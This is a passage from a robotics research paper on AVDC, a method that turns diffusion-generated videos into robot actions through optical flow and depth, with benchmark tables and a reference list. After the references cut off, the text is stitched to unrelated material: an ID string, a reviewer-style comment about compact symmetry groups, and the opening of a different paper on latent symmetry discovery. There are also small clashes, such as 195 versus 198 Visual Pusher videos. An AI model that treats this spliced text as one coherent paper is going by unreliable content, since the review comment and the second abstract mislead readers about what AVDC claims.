Given dense correspondences in 2D (Florence et al., 2018; Manuelli et al., 2022; Sundaresan et al., 2020; Yen-Chen et al., 2022) or 3D (Simeonov et al., 2022; 2023; Chun et al., 2023; Ryu et al., 2023), both object and manipulator poses may be inferred by solving for rigid transforms given the correspondences. Our approach uses dense correspondences between adjacent frames of synthesized videos to calculate object or scene transformations and then infer robot actions.

**Learning from Observation.** In contrast to imitation learning (learning from demonstration; Osa et al., 2018; Kipf et al., 2019; Ding et al., 2019; Fang et al., 2019; Mao et al., 2022; Wang et al., 2023), which assumes access to expert actions, learning-from-observation methods (Torabi et al., 2019b; 2018; 2019a; Lee et al., 2021; Karnan et al., 2022) learn from expert state sequences (e.g., video frames). Action-free pre-training methods (Baker et al., 2022; Escontrela et al., 2023) extract knowledge from unlabeled videos and learn target tasks through RL. For example, a recent approach learns value functions by pre-training on existing video datasets (Chethan et al., 2023). Despite encouraging results, these methods require interacting with environments, which may be expensive or even impossible. In contrast, our proposed method does not require environmental interaction and is therefore more broadly applicable.

## 3 ACTIONS FROM VIDEO DENSE CORRESPONDENCES

The architecture of our proposed framework, Actions from Video Dense Correspondences (AVDC), is depicted in Figure 2. AVDC consists of three modules. Given the initial observation (i.e., an RGBD image of the scene) and a textual task description, we first employ a video synthesis model to generate a video that implicitly captures the sequence of required actions (Section 3.1). Then, we use a flow prediction model to estimate the optical flow of the scene and objects from the synthesized video (Section 3.2). Finally, leveraging the initial depth map and the predicted optical flows, we reconstruct the movements of objects for manipulation or of the robot for navigation, as described in Section 3.3.

### 3.1 TEXT-CONDITIONED VIDEO GENERATION

Our text-conditioned video generation model is a conditional diffusion model. It takes the initial frame and a text description as its condition and learns to model the distribution of possible future frames. Throughout this paper, our video generation model predicts a fixed number of future frames ($T = 8$ in our experiments). The diffusion model aims to approximate the distribution $p(img_{1:T} \mid img_0, txt)$, where $img_{1:T}$ represents the video frames from time step 1 to $T$, $img_0$ denotes the initial frame, and $txt$ represents the task description. We train a denoising function $\epsilon_\theta$ that predicts the noise applied to $img_{1:T}$ given the perturbed frames. Given the Gaussian noise scheduling $\beta_t$, our overall objective is

$$L_{MSE} = \left\| \epsilon - \epsilon_\theta \left( \sqrt{1 - \beta_t}\, img_{1:T} + \sqrt{\beta_t}\, \epsilon,\ t \mid txt \right) \right\|^2,$$

where $\epsilon$ is sampled from a multivariate standard Gaussian distribution and $t$ is a randomly sampled diffusion step.

A main practical challenge with training such video diffusion models is that they are usually computationally expensive. For example, the work closest to ours, UniPi (Du et al., 2023), requires over 256 TPU pods to train.
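As a concrete illustration, here is a minimal PyTorch-style sketch (our assumed interface, not the released code) of one training step with the objective above; the `eps_model` signature is hypothetical.

```python
# Sketch: conditional video-diffusion training loss L_MSE.
import torch

def video_diffusion_loss(eps_model, img0, img_future, text_emb, betas):
    """img0: (B, C, H, W) first frames; img_future: (B, T, C, H, W) frames 1..T;
    text_emb: (B, D) CLIP text embeddings; betas: (num_steps,) noise schedule."""
    t = torch.randint(0, len(betas), (img_future.shape[0],))
    beta_t = betas[t].view(-1, 1, 1, 1, 1)
    eps = torch.randn_like(img_future)
    # Perturb future frames as in the objective above.
    noisy = torch.sqrt(1.0 - beta_t) * img_future + torch.sqrt(beta_t) * eps
    pred = eps_model(noisy, t, cond_frame=img0, text=text_emb)  # hypothetical API
    return ((eps - pred) ** 2).mean()
```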
In this paper, we build a high-fidelity video generation model that can be trained on 4 GPUs in a single day through a series of architectural optimizations. Section G presents complexity analyses and how the process can be significantly accelerated. Our model is a modified version of the image diffusion model proposed by Dhariwal & Nichol (2021), built upon U-Net (Ronneberger et al., 2015), as illustrated in Figure 3a. The U-Net consists of the same number of downsample blocks and upsample blocks. To enhance consistency with the initial frame, we concatenate the input condition frame $img_0$ to all future frames $img_{1:T}$. To encode the text, we use a CLIP-Text (Radford et al., 2021) encoder to obtain a vector embedding and feed it into the video generative model as an additional input to the individual downsampling and upsampling blocks. Importantly, we use a factorized spatial-temporal convolution, similar to the model from Ho et al. (2022), within each ResNet block (He et al., 2016). As shown in Figure 3b, in our approach, the 5D input feature map with shape $(B, H, W, T, C)$, where $B$ is the batch size, $H$ and $W$ represent the spatial dimensions, $T$ is the number of time frames, and $C$ denotes the number of channels, undergoes two consecutive convolution operations. First, we apply a spatial convolution identically and independently to each time step \( t = 1, 2, \ldots, T \). Then, we employ a temporal convolution layer identically and independently at each spatial location. This factorized spatial-temporal convolution replaces conventional 3D convolutions, leading to significant improvements in training and inference efficiency without sacrificing generation quality. More details on the model architecture and training can be found in Section F.

### 3.2 Flow Prediction

To regress actions from predicted videos, we leverage flow prediction as an intermediate representation. We employ the off-the-shelf GMFlow (Xu et al., 2022), a transformer architecture specifically designed for optical flow prediction. Given two consecutive frames \( img_t \) and \( img_{t+1} \) predicted by the video diffusion model, GMFlow predicts the optical flow between the two images as a vector field on the image, which is essentially a pixel-level dense correspondence map between two frames. This allows us to track the movement of each input pixel with a simple integration of this vector field over time.

Alternatively, one could train diffusion models to directly predict the flow by first preprocessing training videos with the flow prediction model. However, in our experiments, we encountered challenges in optimizing such models and observed that they failed to match the performance achieved by the two-stage inference pipeline. We conjecture that this difficulty arises from the lack of spatial and temporal smoothness in flow fields. For instance, the flow field is sparse when only a single object moves. Consequently, the Gaussian diffusion model may not be the optimal model for flow distributions. We empirically compare the two alternatives in subsequent experiments.

### 3.3 Action Regression from Flows and Depths

Based on the predicted flow, which essentially gives us a dense prediction of pixel movements, we can reconstruct object movements and robot movements in the video. Our key insight is that, given the 3D information (depth) of the input frame and dense pixel tracking, we can reconstruct a sequence of 3D rigid transformations for each object.
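Before describing the two settings we consider, note that the "simple integration" of flow fields mentioned in Section 3.2 amounts to chaining frame-to-frame flows into long-range point tracks by sampling each flow field at the current (sub-pixel) point locations. A minimal sketch of this chaining step, assuming precomputed GMFlow outputs, is given below; the helper names are ours, not from the released code.

```python
import torch
import torch.nn.functional as F

def track_points(points, flows):
    """Chain frame-to-frame optical flow into long-range pixel tracks.

    points: (N, 2) initial (x, y) pixel coordinates in frame 0
    flows:  list of (2, H, W) flow fields; flows[t] maps frame t -> t+1
    returns a list of (N, 2) point positions, one entry per frame
    """
    H, W = flows[0].shape[1:]
    tracks = [points]
    for flow in flows:
        p = tracks[-1]
        # normalize to [-1, 1] for grid_sample, then read the flow at sub-pixel positions
        grid = torch.stack([2 * p[:, 0] / (W - 1) - 1,
                            2 * p[:, 1] / (H - 1) - 1], dim=-1).view(1, 1, -1, 2)
        d = F.grid_sample(flow.unsqueeze(0), grid, align_corners=True)  # (1, 2, 1, N)
        tracks.append(p + d.squeeze().T)                                # advect the points
    return tracks
```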
In this work, we explore two different settings: predicting object transformations assuming a fixed camera (fixed-camera object manipulation) and predicting camera (robot) movement assuming a static scene (visual navigation).

**Predict object-centric motion.** We first consider predicting 3D object motions in videos assuming a fixed camera. We represent each object as a set of 3D points \( \{x_i\} \). The points corresponding to the object of interest are extracted by external segmentation methods, such as a pretrained image segmentation model, or simply specified by the human. Given the camera intrinsic matrix and the input RGBD image, we can compute the initial 3D positions of these points. Let \( T_t \) denote the rigid body transformation of the object at time step \( t \) relative to the initial frame. We can express the projection of a 3D point onto the image plane at time step \( t \) as \( KT_t x = (u_t, v_t, d_t) \), where \( K \) is the camera intrinsic matrix. The projected 2D point on frame \( t \) is thus \( (u_t/d_t, v_t/d_t) \). The optical flow tracking provides us with the projection of the same point in frame \( t \), specifically \( u_t/d_t \) and \( v_t/d_t \). By tracking all points in \( \{x_i\} \), we can find the optimal transformation \( T_t \) that minimizes the following L2 loss:

\[ L_{Trans} = \sum_i \left\| \frac{(KT_t x_i)_1}{(KT_t x_i)_3} - \frac{u_t^i}{d_t^i} \right\|^2_2 + \left\| \frac{(KT_t x_i)_2}{(KT_t x_i)_3} - \frac{v_t^i}{d_t^i} \right\|^2_2, \]

where \((u^i_t/d^i_t, v^i_t/d^i_t)\) is the corresponding pixel of point \(x_i\) in frame \(t\), and \((KT_t x_i)_j\) denotes the \(j\)-th entry of the vector. It is worth noting that even if we do not directly observe \(d_t\), this loss function remains well-defined based on the assumption that \(T_t\) represents a rigid body transformation.

During execution, we first extract the mask of the object to manipulate and use the dense correspondences in predicted videos to compute the sequence of rigid body transformations for the object. Next, given the inferred object transformations, we can use existing off-the-shelf robotics primitives to infer actions in the environment. In particular, if the object is graspable, we randomly sample a grasp on the object and then compute the target robot end-effector pose based on the target object pose and the grasping pose. When the object is not directly graspable (e.g., a door), we similarly sample a contact point and use a push action to achieve the target object transformation. We treat the grasp/contact point as the first subgoal. Then, we iteratively apply the computed transformation on the current subgoal to compute the next subgoal until all subgoals are computed. Next, we use a position controller to move the robot through the subgoals one by one. More details on inferring robot manipulation actions can be found in Section H.1. In contrast to our approach, directly regressing actions with a learned inverse dynamics model requires a substantial number of action labels so that a neural network can acquire knowledge such as inverse dynamics, grasping, and motion planning.

**Inferring Robot Motion.** A similar algorithm can also be applied to predict robot (i.e., camera) motion assuming all objects are static. Due to the duality of camera motion and object motion, we can use exactly the same optimization to find \(T_t\) (object-centric motion) and recover the camera motion as \(C_t = (T_t)^{-1}\).
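Minimizing \(L_{Trans}\) over rigid transformations is a small nonlinear least-squares problem. One plausible gradient-based realization, not necessarily the solver used in our implementation, parameterizes \(T_t\) with an axis-angle rotation and a translation and optimizes the reprojection loss with Adam; all names below are ours.

```python
import torch

def axis_angle_to_matrix(w):
    """Rodrigues' formula: axis-angle 3-vector w -> 3x3 rotation matrix."""
    theta = w.norm()
    k = w / theta
    z = torch.zeros((), dtype=w.dtype)
    K = torch.stack([torch.stack([z, -k[2], k[1]]),
                     torch.stack([k[2], z, -k[0]]),
                     torch.stack([-k[1], k[0], z])])
    return torch.eye(3) + theta.sin() * K + (1 - theta.cos()) * (K @ K)

def fit_rigid_transform(K_intr, x0, uv_t, steps=500, lr=1e-2):
    """Optimize T_t = (R, tr) to minimize the reprojection loss L_Trans.

    K_intr: (3, 3) camera intrinsics
    x0:     (N, 3) 3D object points lifted from the initial RGBD frame
    uv_t:   (N, 2) tracked pixel positions of those points in frame t
    """
    w = (1e-3 * torch.randn(3)).requires_grad_()   # axis-angle rotation
    tr = torch.zeros(3, requires_grad=True)        # translation
    opt = torch.optim.Adam([w, tr], lr=lr)
    for _ in range(steps):
        R = axis_angle_to_matrix(w)
        proj = (x0 @ R.T + tr) @ K_intr.T          # (N, 3) = K (R x + tr), row-wise
        uv = proj[:, :2] / proj[:, 2:3]            # perspective division
        loss = ((uv - uv_t) ** 2).sum()
        opt.zero_grad(); loss.backward(); opt.step()
    return axis_angle_to_matrix(w).detach(), tr.detach()
```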
Concretely, we make the following modifications to adapt AVDC to navigation tasks. (1) The video diffusion model is trained to duplicate the last frame once the object is found. (2) Instead of tracking objects, we utilize the optical flow of the whole frame to estimate the rigid transformations between frames. (3) Based on the calculated rigid transformations, we simply map the transformations to the closest actions, as detailed in Section H.2.

**Depth Estimation.** We can reconstruct 3D object or robot trajectories solely from the depth map of the initial frame (i.e., the subsequent depth maps are not required). By leveraging dense correspondences between frames and assuming rigid object motion, we can reconstruct accurate 3D trajectories. This holds significant advantages, as it enables us to train video prediction models exclusively using RGB videos, allowing for learning from online sources like YouTube, and only requires an RGB-D camera (or a monocular depth estimator) at execution time. By eliminating the dependence on depth maps from subsequent frames, our system is significantly more adaptable to various data sources.

**Replanning Strategy.** After inferring the object or robot trajectories, we can execute the trajectory using a position controller in an open-loop manner. Yet, this can suffer from accumulated errors: as the planning horizon increases, the accuracy of predicted object locations diminishes due to combined errors in video synthesis and flow prediction. To mitigate this issue, we propose a replanning strategy. If the robot movement is smaller than 1mm over 15 consecutive time steps while the task has not been fulfilled, we re-run our video generation and action prediction pipeline from the current observation.

### 4 EXPERIMENTS

We describe the baselines and the variants of our proposed method AVDC in Section 4.1. Then, we compare AVDC to its variants and the baselines on simulated robot arm manipulation tasks in Meta-World (Figure 4a) in Section 4.2 and simulated navigation tasks in iTHOR (Figure 4b) in Section 4.3. Note that although it is possible to obtain ground-truth actions from demonstrations in these two domains, our method does not use these actions; they are only used by the baselines to provide an understanding of the task difficulty. Then, Section 4.4 evaluates the ability of AVDC to control robots by learning from out-of-domain human videos without actions, as illustrated in Figure 4c. In Section 4.5, we leverage the Bridge dataset (Figure 4d) and evaluate AVDC on real-world manipulation tasks with a Franka Emika Panda robot arm (Figure 4e). Extended qualitative results can be found in Section B and additional experimental details can be found in Section H.

#### 4.1 BASELINES AND VARIANTS OF AVDC

**Baselines.** We compare AVDC to a multi-task behavioral cloning (BC) baseline given access to a set of expert actions from all videos (15,216 labeled frame-action pairs in Meta-World and 5,757 in iTHOR), which are unavailable to our method.

Figure 4: **Environments & Tasks.** (a) **Meta-World** is a simulated benchmark featuring various tasks with a Sawyer robot arm. (b) **iTHOR** is a simulated benchmark for embodied common sense reasoning. We adopt its object navigation task, requiring navigating to target objects located in different rooms. (c) **Visual Pusher** is a real-world video dataset with 195 human pushing videos.
(d) **Bridge** is a real-world video dataset comprised of 33,078 robot demonstrations conducting various kitchen tasks. (e) **Panda Arm** is a real-world pick-and-place tabletop environment with a Franka Emika Panda robot arm.

This baseline encodes the RGB observation to a feature vector with a ResNet-18 (He et al., 2016). Then, the feature vector is concatenated with a one-hot encoded camera ID and a task representation encoded by the CLIP-Text model (Radford et al., 2021). The concatenated representation is then fed to a 3-layer MLP, which produces an action. We explore initializing the weights of ResNet-18 from scratch (BC-Scratch) or from the pre-trained parameters of R3M (Nair et al., 2022) (BC-R3M). Additionally, we experimented with Diffusion Policy (Chi et al., 2023), which also leverages denoising diffusion but directly predicts actions instead of video frames as we do. We followed the setting used by most of the experiments in the original paper. More details are described in Section H.1.4. We also implement UniPi (Du et al., 2023), a learning-from-video method that learns an inverse dynamics model to generate actions from videos, as a baseline. Specifically, UniPi infers actions from the videos synthesized by AVDC. Since the exact number of steps between two generated frames in our model may vary across different episodes, we modify the inverse dynamics model to output an additional binary label indicating whether to switch to the next frame of the synthesized video plan. This predictor can be trained with the demonstrations (with actions) used to train the BC baselines.

**AVDC and its Variants.** We compare AVDC to its variants that also predict dense correspondence.

- **AVDC (Flow)** learns to directly predict the optical flow between frames, as described in Section 3.2. We include this variant to justify our 2-stage design, which synthesizes a video and then infers optical flows between each pair of frames.
- **AVDC (No Replan)** is the open-loop variant of our proposed method, which synthesizes a video, infers flows, produces a plan, executes it, and finishes, regardless of whether it fails or succeeds. We include this variant to investigate whether our replanning strategy is effective.
- **AVDC (Full)** is our proposed method in full, employing the 2-stage design and able to replan.

**Additional Ablation Studies and Experiments.** We also include additional ablation studies on the effect of first-frame conditioning in video generation and different text encoders (e.g., CLIP and T5) in Section E, a study of extracting object masks with an existing segmentation model in Section D.1, an experiment training BC with more data in Section D.2, an experiment using object masks extensively as a proxy for actions in Section D.3, and a quantitative quality analysis of the synthesized videos in Section D.4.

### 4.2 Meta-World

**Setup.** Meta-World (Yu et al., 2019) is a simulated benchmark featuring various manipulation tasks with a Sawyer robot arm. We include 11 tasks, and for each task, we render videos from 3 different camera poses. The same set of camera poses is used for training and testing. We collect 5 demonstrations per task per camera position, resulting in a total of 165 videos. To isolate the problem of learning object manipulation skills, for our method and all its variants, we provide the ground-truth segmentation mask for the target object. We include an additional study on using external segmentation models in Appendix D.1. Each policy is evaluated on each task with 3 camera poses, each with 25 trials.
A policy succeeds if it reaches the goal state within the maximum number of environment steps and fails otherwise. The positions of the robot arm and objects are randomized when each episode begins. The results are reported in Table 1.

| | door-open | door-close | basketball | shelf-place | btn-press | btn-press-topdown |
|------------------|-----------|------------|------------|-------------|-----------|-------------------|
| BC-Scratch | 21.3% | 36.0% | 0.0% | 0.0% | 34.7% | 12.0% |
| BC-R3M | 1.3% | 58.7% | 0.0% | 0.0% | 36.0% | 4.0% |
| UniPi (With Replan) | 0.0% | 36.0% | 0.0% | 0.0% | 6.7% | 0.0% |
| Diffusion Policy | 45.3% | 45.3% | 8.0% | 0.0% | 40.0% | 18.7% |
| AVDC (ID) | 0.0% | 36.0% | 0.0% | 0.0% | 0.0% | 0.0% |
| AVDC (Flow) | 0.0% | 0.0% | 0.0% | 0.0% | 1.3% | 40.0% |
| AVDC (No Replan) | 30.7% | 28.0% | 21.3% | 8.0% | 34.7% | 17.3% |
| AVDC (Full) | 72.0% | 89.3% | 37.3% | 18.7% | 60.0% | 24.0% |

| | faucet-close | faucet-open | handle-press | hammer | assembly | Overall |
|------------------|--------------|-------------|--------------|--------|----------|---------|
| BC-Scratch | 18.7% | 17.3% | 37.3% | 0.0% | 1.3% | 16.2% |
| BC-R3M | 18.7% | 22.7% | 28.0% | 0.0% | 0.0% | 15.4% |
| UniPi (With Replan) | 4.0% | 9.3% | 13.3% | 4.0% | 0.0% | 6.1% |
| Diffusion Policy | 22.7% | 58.7% | 21.3% | 4.0% | 1.3% | 24.1% |
| AVDC (ID) | 4.0% | 9.3% | 13.3% | 4.0% | 0.0% | 6.1% |
| AVDC (Flow) | 42.7% | 0.0% | 66.7% | 0.0% | 0.0% | 13.7% |
| AVDC (No Replan) | 12.0% | 17.3% | 41.3% | 0.0% | 5.3% | 19.6% |
| AVDC (Full) | 53.3% | 24.0% | 81.3% | 8.0% | 6.7% | 43.1% |

Table 1: Meta-World Results. We report the mean success rate across tasks. Each entry of the table shows the average success rate aggregated from 3 camera poses with 25 seeds for each camera pose.

**Comparison to Baselines.** Our method AVDC (Full) consistently outperforms the two BC baselines (BC-Scratch and BC-R3M) and UniPi on all the tasks by a large margin. Furthermore, AVDC (Full) also outperforms the Diffusion Policy in 10 out of 11 tasks and in overall performance by a significant margin. This indicates that the tasks are still very challenging, even with access to expert actions. Note that AVDC (Full) is able to solve the task “hammer,” which involves using tools, with performance surpassing all baselines. This is done by predicting actions based on tool motions.

**Comparing AVDC Variants.** AVDC (Flow) performs the best on button-press-topdown and achieves reasonable performance on faucet-close and handle-press, while performing very poorly on the rest of the tasks. As described in Section 3.2, the diffusion model employed in this work may not be optimal for flow prediction. Also, AVDC (Full) consistently outperforms AVDC (No Replan), justifying the effectiveness of our closed-loop design, which enables replanning when the policy fails.

**Intermediate Outputs.** To provide insights into the pipeline of AVDC, we visualize the synthesized video, predicted optical flow, and inferred actions (i.e., motion planning) in Figure 5. Our diffusion model synthesizes a reasonable video showing the robot arm picking up the nut and placing it onto the peg. The optical flow predicted from video frames accurately captures the robot arm’s motions. Then, based on the predicted flow, the inferred actions can reliably guide the arm to fulfill the task.

**Effect of Replanning Trials.** We investigate how varying the maximum number of replanning steps affects the performance of AVDC.
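For reference, the replanning rule being ablated here can be sketched as the following control loop; the environment and planner interfaces are hypothetical placeholders and one plausible reading of the 1mm/15-step rule from Section 3.3, not our released code.

```python
import numpy as np

def run_episode(env, plan_subgoals, max_replans=5, eps=1e-3, window=15):
    """Closed-loop execution with the replanning strategy (sketch).

    Replan when the end-effector moves less than 1 mm (eps, in meters)
    over `window` consecutive control steps while the task is unfulfilled.
    """
    obs = env.reset()
    for _ in range(max_replans + 1):
        subgoals = plan_subgoals(obs)          # video -> flows -> transforms -> subgoals
        positions = [env.ee_position()]
        stuck = False
        for goal in subgoals:
            obs = env.step_towards(goal)       # position-controller step(s)
            positions.append(env.ee_position())
            if env.task_done():
                return True
            if len(positions) > window and \
                    np.linalg.norm(positions[-1] - positions[-1 - window]) < eps:
                stuck = True                   # barely moved: trigger replanning
                break
        if not stuck:
            break                              # executed the full plan without stalling
    return env.task_done()
```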
As presented in Figure 6, the success rate consistently increases with more replanning trials, demonstrating the effectiveness of our proposed replanning strategy.

**Failure Modes.** The primary failure mode we observed is errors made by the optical flow tracking model, partially because these models are not trained on any in-domain data. Since the prediction resolution is not very high in our experiments, small pixel-level errors in tracking small objects result in large errors in 3D space. We believe that by increasing the resolution of video synthesis or by training an in-domain optical flow model, we can improve the performance.

### 4.3 iTHOR

**Setup.** iTHOR (Kolve et al., 2017) is a simulated benchmark for embodied common sense reasoning. We consider the object navigation tasks for evaluation, where an agent randomly initialized into a scene learns to navigate to an object of a given type (e.g., toaster, television). At each time step, the agent observes a 2D scene and takes one of the four actions: MoveForward, RotateLeft, RotateRight, and Done. We chose 12 different objects to be placed in 4 types of rooms (e.g., kitchen, living room). No object segmentation is required in this navigation task. Each policy is evaluated on 12 object navigation tasks distributed in 4 different types of rooms (3 tasks for each room). A policy succeeds if the target object is in the agent’s sight and within a 1.5m distance within the maximum number of environment steps or when Done is predicted, and fails otherwise. The position of the agent is randomized at the beginning of each episode. The result is reported in Table 2.

**Comparison to Baselines.** Our proposed method AVDC can find target objects in different types of rooms fairly often (31.3%), while the two BC baselines fail entirely. BC-R3M with a pre-trained ResNet-18 performs worse than BC-Scratch, which can be attributed to the fact that R3M is pre-trained on robot manipulation tasks and might not be suitable for visual navigation tasks.

**Intermediate Outputs.** The intermediate outputs produced by AVDC are presented in Figure 7. The diffusion model can synthesize a video showing an agent navigating to the target object. Then, desired agent movements can be easily inferred from the predicted optical flow, making it straightforward to map the flow to MoveForward, RotateLeft, or RotateRight. When no flow is predicted, it indicates the agent has found the object, and Done is selected as the predicted action.

### 4.4 CROSS-EMBODIMENT LEARNING: FROM HUMAN VIDEOS TO ROBOT EXECUTION

We aim to examine if AVDC can achieve cross-embodiment learning, e.g., leveraging human demonstration videos to control robots to solve tasks.

**Setup.** We evaluate our method on Visual Pusher tasks (Schmeckpeper et al., 2021; Zakka et al., 2022). Specifically, we learn a video diffusion model from only actionless human pushing data (198 videos), with the same U-Net architecture used in the Meta-World experiments, and train the model for 10k steps. Then, we evaluate AVDC on simulated robot pushing tasks without any fine-tuning.

**Results.** AVDC exhibits strong zero-shot transfer capability, achieving a 90% zero-shot success rate over 40 runs. This indicates that AVDC can perform cross-embodiment learning — utilizing out-of-domain human videos to achieve reliable robot execution. A synthesized video and the corresponding robot execution are illustrated in Figure 8.
| Room | BC-Scratch | BC-R3M | AVDC |
|------------|------------|--------|------|
| Kitchen | 1.7% | 0.0% | 26.7% |
| Living Room | 3.3% | 0.0% | 23.3% |
| Bedroom | 1.7% | 1.7% | 38.3% |
| Bathroom | 1.7% | 0.0% | 36.7% |
| Overall | 2.1% | 0.4% | 31.3% |

Table 2: iTHOR Results. We report the mean success rate, aggregated from 3 types of objects per room with 20 episodes per object. Both BC baselines fail to achieve meaningful performance on the iTHOR object navigation tasks. In contrast, AVDC performs reasonably, with a 31.3% average success rate.

### 4.5 Real-World Franka Emika Panda Arm with Bridge Dataset

We aim to investigate if our proposed framework AVDC can tackle real-world robotics tasks. To this end, we train our video generation model on the Bridge dataset (Ebert et al., 2022) and perform evaluation in a real-world Franka Emika Panda tabletop manipulation environment.

**Setup.** The Bridge dataset (Ebert et al., 2022) provides 33,078 teleoperated WidowX 250 robot demonstrations of various kitchen tasks captured by a web camera without depth information. Our real-world setup comprises a Franka Emika Panda robot arm and an Intel RealSense D435 RGBD camera mounted at a fixed frame relative to the table. Due to the differences in camera FOVs and the environmental setup, the video generative model trained on Bridge does not directly generalize well to our setup. We thus fine-tuned the diffusion model with 20 human demonstrations collected with our setup. In our real-world evaluation, we assume that the target object can be grasped using a top-grasp, so that no reorientation of the target object is needed. Note that neither the Bridge dataset nor our human demonstration dataset contains any action labels relevant to our robot: Bridge is based on a different robot model, and our tabletop videos are human hand manipulation videos.

**Zero-Shot Generalization of the Bridge Model.** We found that the video diffusion model trained on Bridge videos can reasonably generalize to real scenes without fine-tuning, as discussed in Section C.

**Results.** Qualitative results of predicted object motion on the Bridge dataset are presented in Figure 9. AVDC can reliably synthesize videos, predict optical flow, identify target objects, and infer actions. Figure 10 presents visualizations of planned robot trajectories, showcasing the successful deployment of our system. More qualitative results can be found in Section B. We also quantitatively evaluated the entire pipeline. To this end, we set up 10 scenes with different initial object configurations and tasks. Each task requires a pick-and-place of an object of a specified category (e.g., apple) into a container (e.g., plate). The results are detailed in Section H.3.

### 5 Discussion

**Limitations.** The proposed AVDC, while successful in diverse simulated and real-world settings, faces several challenges. First, the algorithm may lose track of objects heavily occluded by the robot arm or struggle with optical flow prediction when there are rapid lighting changes or significant object movements. Additionally, our current implementation is not adept at handling tasks with deformable objects, requiring future work to develop new strategies for tracking or representing these objects, such as key-point-based tracking.
Real-world manipulation tasks, which often require predicting grasps or contact points, are also challenging due to the disparity between human hands and different robot hands, necessitating the integration of specialized manipulation algorithms such as grasp prediction modules (Sundermeyer et al., 2021). Lastly, force information cannot be recovered from RGB videos. Future work may consider leveraging real-world interaction data to address this.

**Conclusion.** This work presents an approach to learning to act directly in environments given only RGB video demonstrations, by exploiting dense correspondences between synthesized video frames. We illustrate the general applicability of our approach in both simulated and real-world manipulation and navigation tasks and in cross-embodiment settings. We further present an open-source implementation for fast and efficient video modeling. We hope our work inspires further work on learning from videos, which can be readily found on the internet and easily captured across robots.

**Acknowledgement.** We thank the anonymous reviewers for their valuable comments. We gratefully acknowledge support from ONR MURI grant N00014-16-1-2007; from the Center for Brains, Minds and Machines (CBMM, funded by NSF STC award CCF-1231216); from NSF grant 2214177; from the Air Force Office of Scientific Research (AFOSR) grant FA9550-22-1-0249; from ONR MURI grant N00014-22-1-2740; from ARO grant W911NF-23-1-0034; from the MIT-IBM Watson AI Lab; from the MIT Quest for Intelligence; and from the Boston Dynamics Artificial Intelligence Institute. This project was partially supported by the National Science and Technology Council in Taiwan (NSTC 111-2221-E-002-189). Shao-Hua Sun was partially supported by the Yushan Fellow Program of the Ministry of Education, Taiwan. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the authors and do not necessarily reflect the views of our sponsors.

REFERENCES

Shikhar Bahl, Abhinav Gupta, and Deepak Pathak. Human-to-robot imitation in the wild. In Robotics: Science and Systems, 2022.

Bowen Baker, Ilge Akkaya, Peter Zhokhov, Joost Huizinga, Jie Tang, Adrien Ecoffet, Brandon Houghton, Raul Sampedro, and Jeff Clune. Video PreTraining (VPT): Learning to Act by Watching Unlabeled Online Videos. In Neural Information Processing Systems, 2022.

Homanga Bharadhwaj, Abhinav Gupta, Shubham Tulsiani, and Vikash Kumar. Zero-Shot Robot Manipulation from Passive Human Videos. arXiv:2302.02011, 2023.

Annie S Chen, Suraj Nair, and Chelsea Finn. Learning Generalizable Robotic Reward Functions from "In-The-Wild" Human Videos. In Robotics: Science and Systems, 2021.

Bhateja Chethan, Guo Derek, Ghosh Dibya, Singh Anikait, Tomar Manan, Vuong Quan, Chebotar Yevgen, Levine Sergey, and Kumar Aviral. Robotic Offline RL from Internet Videos via Value-Function Pre-Training. arXiv:2309.13041, 2023.

Cheng Chi, Siyuan Feng, Yilun Du, Zhenjia Xu, Eric Cousineau, Benjamin Burchfiel, and Shuran Song. Diffusion Policy: Visuomotor Policy Learning via Action Diffusion. In Robotics: Science and Systems (RSS), 2023.

Ethan Chun, Yilun Du, Anthony Simeonov, Tomas Lozano-Perez, and Leslie Kaelbling. Local Neural Descriptor Fields: Locally Conditioned Object Representations for Manipulation. In IEEE International Conference on Robotics and Automation, 2023.

Prafulla Dhariwal and Alexander Nichol. Diffusion Models Beat GANs on Image Synthesis. In Neural Information Processing Systems, 2021.
Yiming Ding, Carlos Florensa, Pieter Abbeel, and Mariano Phielipp. Goal-Conditioned Imitation Learning. In Neural Information Processing Systems, 2019.

Yilun Du, Mengjiao Yang, Bo Dai, Hanjun Dai, Ofir Nachum, Joshua B Tenenbaum, Dale Schuurmans, and Pieter Abbeel. Learning Universal Policies via Text-Guided Video Generation. In Neural Information Processing Systems, 2023.

Frederik Ebert, Yanlai Yang, Karl Schmeckpeper, Bernadette Bucher, Georgios Georgakis, Kostas Daniilidis, Chelsea Finn, and Sergey Levine. Bridge Data: Boosting Generalization of Robotic Skills with Cross-Domain Datasets. In Robotics: Science and Systems, 2022.

Alejandro Escontrela, Ademi Adeniji, Wilson Yan, Ajay Jain, Xue Bin Peng, Ken Goldberg, Youngwoon Lee, Danijar Hafner, and Pieter Abbeel. Video Prediction Models as Rewards for Reinforcement Learning. arXiv:2305.14343, 2023.

Bin Fang, Shidong Jia, Di Guo, Muhua Xu, Shuhuan Wen, and Fuchun Sun. Survey of Imitation Learning for Robotic Manipulation. International Journal of Intelligent Robotics and Applications, 2019.
xbXASfz8MD
If I understood correctly, the proposed method works for compact groups only. The experiments demonstrate that the method can learn trajectories that are isomorphic to circles. How will the method behave on the data which has translation symmetry only? Will it fail? If so, the set of admissible symmetries seems more limited and should be highlighted
LATENT SPACE SYMMETRY DISCOVERY

Anonymous authors
Paper under double-blind review

ABSTRACT

Equivariant neural networks require explicit knowledge of the symmetry group. Automatic symmetry discovery methods aim to relax this constraint and learn invariance and equivariance from data. However, existing symmetry discovery methods are limited to linear symmetries in their search space and cannot handle the complexity of symmetries in real-world, often high-dimensional data. We propose a novel generative model, Latent LieGAN (LaLiGAN), which can discover nonlinear symmetries from data. It learns a mapping from data to a latent space where the symmetries become linear and simultaneously discovers symmetries in the latent space. Theoretically, we show that our method can express any nonlinear symmetry under certain conditions. Experimentally, our method can capture the intrinsic symmetry in high-dimensional observations, which results in a well-structured latent space that is useful for other downstream tasks. We demonstrate the use cases for LaLiGAN in improving equation discovery and long-term forecasting for various dynamical systems.

1 INTRODUCTION

